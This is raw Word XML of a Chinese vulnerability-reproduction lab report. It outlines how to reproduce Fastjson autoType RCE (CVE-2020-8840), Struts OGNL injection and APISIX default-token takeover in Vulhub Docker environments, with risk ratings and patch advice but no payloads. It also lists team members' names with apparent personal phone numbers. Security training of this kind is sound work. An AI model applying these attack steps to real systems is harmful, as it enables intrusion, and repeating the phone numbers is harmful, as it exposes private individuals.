      <w:tr w:rsidR="00F35D50" w14:paraId="13DDE9A4" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EDA1F31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权限要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70EB746A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无需权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35D50" w14:paraId="2D606860" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4358F80B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500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="47309211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全局影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35D50" w14:paraId="437696FF" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6690E850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数据保密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="602D432A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数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35D50" w14:paraId="4D10A8E2" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="378B8E54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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7FDFF03F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传输被破坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35D50" w14:paraId="74965806" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="132BB3A8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服务器危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E97E76F" w14:textId="77777777" w:rsidR="00F35D50" w:rsidRDefault="00F35D50" w:rsidP="00AB1914">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>被提取权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74CE545B" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="2A871FD8" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8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9"/>
    </w:p>
    <w:p w14:paraId="1CDD73D1" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc13939"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="41FE4855" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="697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6B0E44D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B3353D5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B2407F0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051823E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:rsidR="00FE1C0F" w14:paraId="5DEAC69B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29CD7A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5BCB10B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2E09FCE" w14:textId="35AB14ED" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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侯博文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E5F6D23" w14:textId="036BEBAD" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia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13022498745</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="5ECA0E2D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2D221EC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26C06A5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547AC5A" w14:textId="22DE8020" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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郝志成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9ABCC51" w14:textId="1844F62A" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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A7170">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>15063560713</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="1E1C9ACF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88EAA85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4305F72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ECA7BEC" w14:textId="3FD86F62" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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陆皓喆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900C89B" w14:textId="0E9C2482" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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15058298819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="0633BEF9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6BA907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40435E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F652E1C" w14:textId="1A093311" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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秦德龙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A6D484" w14:textId="0E1B03D2" w:rsidR="00FE1C0F" w:rsidRDefault="00E4305C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E4305C">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>16622753767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="4A1F5681" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="376"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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A3202F8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A89386" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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3054B2" w14:textId="1BA1C5AE" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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胡博浩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22E0269" w14:textId="31ECD98F" w:rsidR="00FE1C0F" w:rsidRDefault="00171E0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 w:rsidRPr="006A7170">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>18270856986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A1AA48C" w14:textId="4A4FB1B1" w:rsidR="009A1299" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc7909"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="44890E70" w14:textId="573533FF" w:rsidR="009A1299" w:rsidRPr="009A1299" w:rsidRDefault="009A1299" w:rsidP="009A1299">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>astjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>structs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062751">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APISIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9ED2A" w14:textId="3578106B" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/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3"/>
        <w:gridCol w:w="4376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB2038" w14:paraId="0BD7E54C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3C308A" w14:textId="2ECF1FF0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376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F1ECE29" w14:textId="070A19F1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:rsidR="00DB2038" w14:paraId="2F6C803C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74844563" w14:textId="2991EA60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4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1166CA53" w14:textId="5DD924B6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利用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ulhub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中的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ocker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环境，搭建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ocker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环境，访问目标端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB2038" w14:paraId="4DEE1138" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70804C78" w14:textId="6E625107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漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCB5D7F" w14:textId="617178DA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.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构造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H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TTP GET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请求绕过身份验证进入后台，复现</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CEB6F7" w14:textId="50EFFA3B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szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>构建请求，抓包并修改，使请求</w:t>
            </w:r>
            <w:r w:rsidRPr="003D1839">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>可以执行</w:t>
            </w:r>
            <w:r w:rsidR="00730CDF">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，复现</w:t>
            </w:r>
            <w:r w:rsidR="00730CDF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05028D29" w14:textId="054DF5CE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szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在目标机中检查命令执行是否成功，检验漏洞的可利用性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB2038" w14:paraId="181A2A0E" w14:textId="77777777" w:rsidTr="00B34ACB">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41177B71" w14:textId="1ADB8BAC" w:rsidR="00DB2038" w:rsidRDefault="00DB2038" w:rsidP="00DB2038"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修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE77FAF" w14:textId="738A02EC" w:rsidR="00DB2038" w:rsidRDefault="00DB2038" w:rsidP="00DB203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更新官方补丁即可。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1553B993" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/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651"/>
        <w:gridCol w:w="5721"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="76F6C5A1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4802F0DA" w14:textId="77777777" w:rsidR="00FE1C0F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33DEBABB" w14:textId="77777777" w:rsidR="00FE1C0F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02AE621E" w14:textId="77777777" w:rsidR="00FE1C0F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:rsidR="00FE1C0F" w14:paraId="203A580F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74089C30" w14:textId="77777777" w:rsidR="00FE1C0F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095CC12C" w14:textId="6747B49F" w:rsidR="00FE1C0F" w:rsidRDefault="00DB203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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="466B5F78" w14:textId="06FA3F8D" w:rsidR="00FE1C0F" w:rsidRDefault="00997C89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>在开启了</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>autoType</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>功能的情况下（</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>autoType</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>功能默认关闭），该漏洞影响最新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>fastjson 1.2.62</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>版本，攻击者利用该漏洞可实现在目标机器上的远程代码执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="75C6F579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79510CA4" w14:textId="77777777" w:rsidR="00FE1C0F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355EDD93" w14:textId="35921331" w:rsidR="00FE1C0F" w:rsidRDefault="00DB203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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13671CC2" w14:textId="45D8657E" w:rsidR="00FE1C0F" w:rsidRDefault="00997C89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>在使用某些</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tag</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>等情况下可能存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OGNL</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>表达式注入漏洞，从而造成远程代码执行，风险极大。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="1169D702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6CC4093B" w14:textId="77777777" w:rsidR="00FE1C0F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651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37A31A64" w14:textId="55B46C2F" w:rsidR="00FE1C0F" w:rsidRDefault="00DB2038">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07382ED8" w14:textId="2695E672" w:rsidR="00FE1C0F" w:rsidRDefault="00997C89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>当使用者开启了</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Admin API</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>，没有配置相应的</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>访问策略，且没有修改配置文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>的情况下，则攻击者利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>的默认</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>即可访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>，从而控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="00997C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>网关。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="246A2698" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="175757E8" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="5BE6503D" w14:textId="35B994B4" w:rsidR="00FE1C0F" w:rsidRDefault="00000000" w:rsidP="003A1534">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现过程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4"/>
    </w:p>
    <w:p w14:paraId="2DA10DED" w14:textId="6B395381" w:rsidR="00FE1C0F" w:rsidRDefault="00F659CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见下文测试方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A007CE" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="145820FC" w14:textId="437A85E8" w:rsidR="00FE1C0F" w:rsidRDefault="003A1534">
      <w:r w:rsidRPr="00DC1C4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新到最新版本即可避免该漏洞的利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F63166" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc4033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61CB5F07" w14:textId="4F5877E0" w:rsidR="00DE2C39" w:rsidRPr="00DE2C39" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:r w:rsidRPr="00DE2C39">
        <w:t>CVE-2020-8840</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E028F75" w14:textId="7D6FF9EF" w:rsidR="00CB41B8" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc28445"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
